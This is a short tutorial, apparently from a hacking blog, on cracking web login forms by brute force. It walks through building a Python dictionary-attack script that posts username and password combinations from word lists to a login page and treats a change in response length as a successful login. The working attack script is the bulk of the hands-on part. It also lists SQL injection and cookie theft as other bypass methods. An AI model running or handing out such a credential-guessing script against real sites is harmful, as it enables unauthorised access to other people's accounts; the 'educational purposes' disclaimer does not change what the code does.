How to
crack an online login form
First of all and most important, this tutorial is for educational purposes only .
It aims to help everyone who wants to know how brute-forcing practically works, so if you're not a newbie you probably won't read anything new.
For this tutorial you should already know how basic html tags work and what PHP does,
I know there are dozens of tools out there that do exactly the same thing as the tool we're going to code together will do.
However it is crucial for your path into the world of software, networks and hacking to understand
how those tools actually work behind that nice, comfortable GUI they often offer us.
Online login forms
offer us a way to enter a private section of a website.
You access them using the login credentials you chose to be yours when you first signed up.
If you don't have any login data you can't login.
Here's what a typical login form looks like
Code:
<form action="login.php" method="POST">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" name="submit" value="login">
</form>
The data will be processed in the login.php file, it will check whether you entered the wrong or right username-password combo.
Bypassing login forms
is what hackers do in order to gain access to a private section of a website by either
- exploiting database vulnerabilities to find credentials (SQL-Injection)
- session hijacking (cookie theft)
- social engineering (shoulder surfing)
- guessing the shit out of all possible passwords one could use
There're a couple of other techniques apart from those mentioned above but we're going to focus on how to brute-force login credentials since
it offers a great opportunity to learn about networks and protocols as you dig deeper into it.
Password crackers
mostly use dictionary attacks to guess the users or admins password.
Thereby they run through a list of words until they find a word that matches the actual password.
Hands on
I'm using python because it's easy to read and understand, however I'm not a python god.
I'm using the requests library to fire off post-requests to the web-server that contains the webpage.
Code:
import requests
payload ={'username':'admin','password':'12345'}
r = requests.post("http://example.org/login.php",data=payload)
print r.headers
I'm importing requests, which you have to install first, then
issue a post-request to the server with the login credentials you declared to be sent in your payload,
'r.headers' will return the servers response-header.
Note that 'username' and 'password' are the names of the input tags in the login form from above.
Now we want to try different passwords and usernames and permute them, therefore our code needs to be rewritten to
Code:
import requests
username_list = open("usrlist.txt","r"); #open file with usernames
for x in username_list: #loop through them
password_list = open("pwlist.txt","r") #open file with pws
for y in password_list: #loop through them
x = x.strip();y = y.strip() #cut off \n
payload ={'username':x,'password':y} #set payload
print "Trying"
print payload
r = requests.post("http://example.org/login.php",data=payload)
Now we have to find a way to signalize that the right username-password combination has been found, which turns out to be fairly difficult sometimes.
One way is to fingerprint the Content-length attribute of the response-header as we send a post-request to the server
that will definitely result in a login failure and later compare that length to the Content-length sent back from each individual attempt.
However, if the server doesn't allow the Content-length http attribute we're out of luck, so make sure it's sent back
by analyzing the server response in Wireshark first.
Here's what a very simple password cracker script in python might look like
import requests
#bullshit request
payload ={'username':'kkchicka','password':'kkchicka'}
g = requests.post("http://example.org/login.php",data=payload)
failure_length = int(g.headers['Content-length'])
username_list = open("usrlist.txt","r");
for x in username_list:
password_list = open("pwlist.txt","r")
for y in password_list:
x = x.strip();y = y.strip()
payload ={'username':x,'password':y}
print "[!] Trying"
print payload
r = requests.post("http://example.org/login.php",data=payload)
if int(r.headers['Content-length']) != failure_length:
print "Password found!"
exit()
0 Comments:
Post a Comment